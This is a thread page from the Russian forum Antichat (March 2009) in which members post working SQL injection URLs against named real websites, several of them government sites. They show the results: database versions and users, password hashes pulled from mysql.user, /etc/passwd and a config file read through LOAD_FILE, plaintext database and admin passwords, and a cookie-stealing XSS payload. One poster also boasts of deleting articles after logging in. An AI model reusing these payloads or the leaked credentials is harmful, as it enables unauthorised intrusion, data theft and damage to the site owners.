ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8221  
Старый 08.03.2009, 18:17
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Код:
http://www.lasvegasphilharmonic.com/about/bio.php?ID=-35'+union+select+1,2,3,4,5/*&type=M
5.0.27

Код:
http://www.nlr.net/about/bio.php?id=-7+union+select+1,2,3,4,5,6,7,8/*
5.0.45-log

Код:
http://www.mymissouri32.com/people/bio.php?id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
5.0.45

Код:
http://www.youngstartup.com/corporate09/bio.php?id=-1068+union+select+1,2,3,3/*
4.0.20-standard

Код:
http://www.dunyakan.com/bio.php?id=-2+union+select+1,2/*&lang=en
4.1.21-standard-log

Код:
http://www.kmiz.com/people/bio.php?id=-51+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,database(),16/
*
5.0.45
 
Ответить с цитированием

  #8222  
Старый 08.03.2009, 18:21
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

Код:
http://www.sweetfactory.ru
Версия: 4.1.22-log
Код:
http://www.sweetfactory.ru/shok.php?gp=-39%20union%20select%201,2,3,4,5,6--
 
Ответить с цитированием

  #8223  
Старый 08.03.2009, 18:55
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

Цитата:
http://www.naga.gov.ph/sp/list.php?id=587687645434687+UNION+SELECT+1,AES_DEC RYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Databa se(),0x3a,User(),0x3a),0x71),0x71)--
Database Version: 4.1.10
Database name: ordinances
User name: root@192.168.2.2



Цитата:
http://www.naga.gov.ph/sp/list.php?id=587687645434687+UNION+SELECT+1,AES_DEC RYPT(AES_ENCRYPT(CONCAT(0x3a,Password,0x3a,User,0x 3a),0x71),0x71)+from+mysql.user+limit+1,1--

773a716368a9f480 : phpBB
6b05b5b330c85e6e : bplt
5be75b377fe12423 : squidalyser
1ef20cb70c8499bb : dbuser:
*527B4FF4B7421D9786914C59FF8E9382BAF1978C : root

Читаем /etc/passwd

Цитата:
http://www.naga.gov.ph/sp/list.php?id=587687645434687+UNION+SELECT+1,AES_DEC RYPT(AES_ENCRYPT(CONCAT(0x3a,LOAD_FILE(0x2F6574632 F706173737764),0x3a),0x71),0x71)--

Читаем /usr/home/web/www.naga.gov.ph/includes/config.php

Цитата:
http://www.naga.gov.ph/sp/list.php?id=587687645434687+UNION+SELECT+1,AES_DEC RYPT(AES_ENCRYPT(CONCAT(0x3a,LOAD_FILE(0x2F7573722 F686F6D652F7765622F7777772E6E6167612E676F762E70682 F696E636C756465732F636F6E6669672E706870),0x3a),0x7 1),0x71)--

// define our database connection
define('MYSQL_ASSOC', 'dune');
define('DB_SERVER', 'www.naga.gov.ph');
define('DB_SERVER_USERNAME', 'root');
define('DB_SERVER_PASSWORD', 'Genesis11');
//define('DB_DATABASE', 'web_apps');

И так далее..... =)
 
Ответить с цитированием

  #8224  
Старый 08.03.2009, 19:16
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

http://www.eurocups.ru/champs/table.php?id=1231234%20union%20select%201,version( ),3%20--


Database Version: 5.0.26-log
Database name: eurocupru_main
User name: eurocupru_main@localhost
 
Ответить с цитированием

  #8225  
Старый 08.03.2009, 19:34
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

Цитата:
http://www.anqing.gov.cn/include/web_view.php?id=9798654334547987+union+select+1,2, concat_ws(0x3a,version(),user(),database()),4,5,6, 7,8,9,10,11--

Version:4.0.16-standard
User:webuser@localhost
Database:web



Цитата:
http://www.qaia.gov.jo/inner_links_en.php?id=979864544546547987+union+sel ect+1,2,3,concat_ws(0x3a,version(),user(),database ()),5,6,7,8,9,10--

5.0.67-community-log
qaiagov_aliauser@localhost
qaiagov_alia
 
Ответить с цитированием

  #8226  
Старый 08.03.2009, 19:44
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744

Репутация: 246
Отправить сообщение для S0ulVortex с помощью ICQ
По умолчанию

www.fresnomag.com

Код:
http://www.fresnomag.com/news.php?ax=v&n=10&id=10&nid=-3+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5--
Version: 4.1.22-standard-log
User: fresnoma_admin@localhost
Database: fresnoma_cms
 
Ответить с цитированием

  #8227  
Старый 08.03.2009, 22:03
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
http://www.comsult.co.za/newnews.php?id=-999999999999+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6
user():database():version()
comsult@ns1.pluto.co.za:comsult:5.0.51a-community-log


Код:
http://www.comsult.co.za/newnews.php?id=-999999999999+union+select+1,2,3,4,concat_ws(0x3a,username,password),6+from+users
Admin User: gwalker:hayley12
Admin Panel: http://www.comsult.co.za/admin.php
XSS: http://www.comsult.co.za/admin.php?msg=<script>alert(document.cookie)</script>

PS: Смысл этой админки не понял...
Спустя 5 мин:
Уже понял. После логина можно удалять статьи =) ыЫ

Последний раз редактировалось mailbrush; 08.03.2009 в 22:18..
 
Ответить с цитированием

  #8228  
Старый 08.03.2009, 22:13
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Код:
http://www.saferoadsalliance.org/newsdetail.php?id=-1+union+all+select+0,1,2,concat_ws(version(),user(),database()),4,5,6,7--
юзер/версия/бд:

Код:
iwallis_dbread@localhost5.0.67-community-logiwallis_sra
 
Ответить с цитированием

  #8229  
Старый 08.03.2009, 22:22
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

SeaZone.com
PageRank = 5
Код:
http://www.seazone.com/newsNews.php?id=-999999999999+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9/*
user():database():version()
seazone@DS1004.dedicated.turbodns.co.uk:seazone:4. 1.20-community-nt-log
 
Ответить с цитированием

  #8230  
Старый 08.03.2009, 22:26
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Код:
http://braintumorfoundation.org/newsdetail.php?ID=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3,4--
юзер/версия/бд:
Код:
btf2@localhost5.0.67-community-ntbraintumorfoundation_org_-_maindb
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 15 (пользователей: 0 , гостей: 15)
 


Быстрый переход




ANTICHAT.XYZ